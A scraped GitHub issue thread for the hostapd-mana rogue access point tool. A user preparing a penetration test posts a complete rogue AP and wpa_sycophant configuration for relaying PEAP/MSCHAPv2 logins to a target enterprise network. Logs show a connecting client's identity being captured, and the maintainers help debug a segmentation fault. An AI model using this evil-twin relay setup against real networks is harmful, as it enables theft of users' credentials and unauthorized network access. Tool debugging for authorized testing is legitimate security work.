Comments (11)
Sn00z3r
commented on August 20, 2024
Fixed layout
from hostapd-mana.
cablethief
commented on August 20, 2024
Could you try using a previous commit?
Maybe 7c13241
from hostapd-mana.
Sn00z3r
commented on August 20, 2024
Hi,
No more segmentation fault, however it still doesn't seem to work, but this is probably a configuration issue at my end:
Victim is windows 10 1903
hostapd.conf
interface=wlan0
channel=6
ssid=DEMO
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eapol_version=2
ca_cert=ca.pem
eap_user_file=eap_user
server_cert=server.pem
private_key=server.key
private_key_passwd=
dh_file=dhparam.pem
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
mana_eapsuccess=1
# Prevent dissasociations
disassoc_low_ack=0
ap_max_inactivity=3000
# Both open and shared auth
auth_algs=3
# no SSID cloaking
# Finally, enable mana
enable_mana=1
enable_sycophant=1
sycophant_dir=/tmp/
sycophant config
network={
ssid="TARGET"
# The SSID you would like to relay and authenticate against.
scan_ssid=1
key_mgmt=WPA-EAP
# Do not modify
identity=""
anonymous_identity=""
password=""
# This initialises the variables for me.
# -------------
eap=PEAP
phase1="crypto_binding=0 peaplabel=0"
phase2="auth=MSCHAPV2"
# Dont want to connect back to ourselves,
# so add your rogue BSSID here.
bssid_blacklist=d2:d9:cf:df:bf:7f
}
Hostapd and sycophant output
hostapd-mana hostapd.conf
Configuration file: hostapd.conf
MANA: Sycohpant state directory set to /tmp/.
Using interface wlan0 with hwaddr 00:c0:ca:a6:53:a1 and ssid "CRONOS Wifi FAST"
random: Only 16/20 bytes of strong random data available from /dev/random
random: Not enough entropy pool available for secure operations
WPA: Not enough entropy in random pool for secure operations - update keys later when the first station connects
wlan0: interface state UNINITIALIZED->ENABLED
wlan0: AP-ENABLED
wlan0: STA 9c:b6:d0:0a:8c:a5 IEEE 802.11: associated
wlan0: CTRL-EVENT-EAP-STARTED 9c:b6:d0:0a:8c:a5
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=1
MANA EAP Identity Phase 0: test
wlan0: CTRL-EVENT-EAP-PROPOSED-METHOD vendor=0 method=25
MANA EAP Identity Phase 1: test
EAP-PEAP: TLV Result - Failure - requested Failure
wlan0: CTRL-EVENT-EAP-FAILURE 9c:b6:d0:0a:8c:a5
wlan0: STA 9c:b6:d0:0a:8c:a5 IEEE 802.1X: authentication failed - EAP type: 0 (unknown)
wlan0: STA 9c:b6:d0:0a:8c:a5 IEEE 802.1X: Supplicant used different EAP type: 25 (PEAP)
wlan0: STA 9c:b6:d0:0a:8c:a5 IEEE 802.11: disassociated
^Cwlan0: interface state ENABLED->DISABLED
wlan0: AP-DISABLED
nl80211: deinit ifname=wlan0 disabled_11b_rates=0
./wpa_sycophant.sh -c wpa_sycophant_example.conf -i wlan0
SYCOPHANT : RUNNING "./wpa_supplicant/wpa_supplicant -i wlan0 -c wpa_sycophant_example.conf"
SYCOPHANT : RUNNING "dhclient wlan0"
Successfully initialized wpa_sycophant
_ _
__ ___ __ __ _ ___ _ _ ___ ___ _ __ | |__ __ _ _ __ | |_
\ \ /\ / / '_ \ / _` | / __| | | |/ __/ _ \| '_ \| '_ \ / _` | '_ \| __|
\ V V /| |_) | (_| | \__ \ |_| | (_| (_) | |_) | | | | (_| | | | | |_
\_/\_/ | .__/ \__,_|___|___/\__, |\___\___/| .__/|_| |_|\__,_|_| |_|\__|
|_| |_____| |___/ |_|
The most important part is the ascii art - Georg-Christian Pranschke
Set MANA to relay
wlan0: Trying to associate with 00:2a:10:87:2b:7e (SSID='CRONOS Wifi' freq=5280 MHz)
wlan0: CTRL-EVENT-REGDOM-CHANGE init=CORE type=WORLD
wlan0: Associated with 00:2a:10:87:2b:7e
wlan0: CTRL-EVENT-SUBNET-STATUS-UPDATE status=0
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
SYCOPHANT : Getting Identity
SYCOPHANT : Config phase 1 ident : - hexdump_ascii(len=0):
SYCOPHANT : Phase 1 Identity : - hexdump_ascii(len=17):
77 65 6c 6c 65 79 61 40 63 72 6f 6e 6f 73 2e 62 [email protected]
65 e
wlan0: CTRL-EVENT-EAP-STARTED EAP authentication started
SYCOPHANT : Getting Identity
SYCOPHANT : Config phase 1 ident : - hexdump_ascii(len=17):
43 54 52 4c 2d 45 56 45 4e 54 2d 45 41 50 2d 53 CTRL-EVENT-EAP-S
54
from hostapd-mana.
cablethief
commented on August 20, 2024
I think ive seen this before, maybe an issue with the eap_file, Ill setup and test tomorrow to try help
from hostapd-mana.
Sn00z3r
commented on August 20, 2024
Dear,
Thank you very much. I think I need to make sure that my eap file just
accepts whatever username/password is sent from the client so that
sycophant can start relaying.
This is the point where I fail atm :). Penetration test is on Thursday, so
if I can get it working by then it would be great 😊.
Best regards!
…On Tue, 14 Jan 2020, 16:51 Michael Kruger, ***@***.***> wrote:
I think ive seen this before, maybe an issue with the eap_file, Ill setup
and test tomorrow to try help
—
You are receiving this because you modified the open/close state.
Reply to this email directly, view it on GitHub
<#43?email_source=notifications&email_token=AE774KUTDPABFM3TM2HNXL3Q5XNQFA5CNFSM4KGSEC4KYY3PNVWWK3TUL52HS4DFVREXG43VMVBW63LNMVXHJKTDN5WW2ZLOORPWSZGOEI5DPFY#issuecomment-574240663>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AE774KWVAQVSKOYNPJE6BJ3Q5XNQFANCNFSM4KGSEC4A>
.
from hostapd-mana.
cablethief
commented on August 20, 2024
you know what it might be, the state file isnt clearing cause somebody wanted nice names xD. let me update that quick :D
from hostapd-mana.
cablethief
commented on August 20, 2024
That fixes one potential problem.
from hostapd-mana.
cablethief
commented on August 20, 2024
Oops, started commenting on the wrong thread, sorry.
from hostapd-mana.
Sn00z3r
commented on August 20, 2024
Not going to close this one as I think the segmantation fault in the new version is still there. I'll check next week what is wrong with the code :)
from hostapd-mana.
Sn00z3r
commented on August 20, 2024
Fix is already proposed here:
Problem is that the strings that are being freed are static ones causing a segmentation fault
from hostapd-mana.
singe
commented on August 20, 2024
hostapd-mana has been fixed.
from hostapd-mana.
Related Issues (20)
- Feature request - PEAP/MSCHAPv2 MITM (relaying) HOT 2
- error when using 'make -C hostapd-mana' HOT 2
- Stuck in 'obtaining ip address' when trying to connect to the AP HOT 1
- libssl.so.1.0.0 Not Found HOT 4
- Multiple BSS with Hostapd HOT 3
- [WPA-EAP] client cannot join EAPOL TX: Message too long HOT 1
- client connected but hash not captured HOT 2
- is this possible !!!!!!!!!!!!!!!!?????
- no_probe_resp_if_max_sta = 0 not working
- Feature request: Logging EAP Identity
- ACL Bug: MAC Address Bitmasks Ignored After VLAN ID
- ACL Bug: Bitmasks Break Binary Search
- Berate_ap gets stuck on internet sharing method nat. No ap created, kali nethunter
- WPA/2 Pre-shared Key (PSK) Networks HOT 1
- Python 3 support?
- Error Handling Directed Probes HOT 1
- ld returned 1 exit status HOT 3
- . HOT 2
- .
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from hostapd-mana.